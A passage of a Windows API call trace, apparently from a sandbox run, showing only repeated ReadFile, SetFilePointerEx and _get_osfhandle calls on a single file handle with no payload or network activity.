lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: 
lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.645] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 
[0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.646] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, 
lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.647] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.648] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.648] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.648] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.648] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.718] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.718] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0098.718] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.718] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 
[0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.719] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.720] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.721] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 
[0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, 
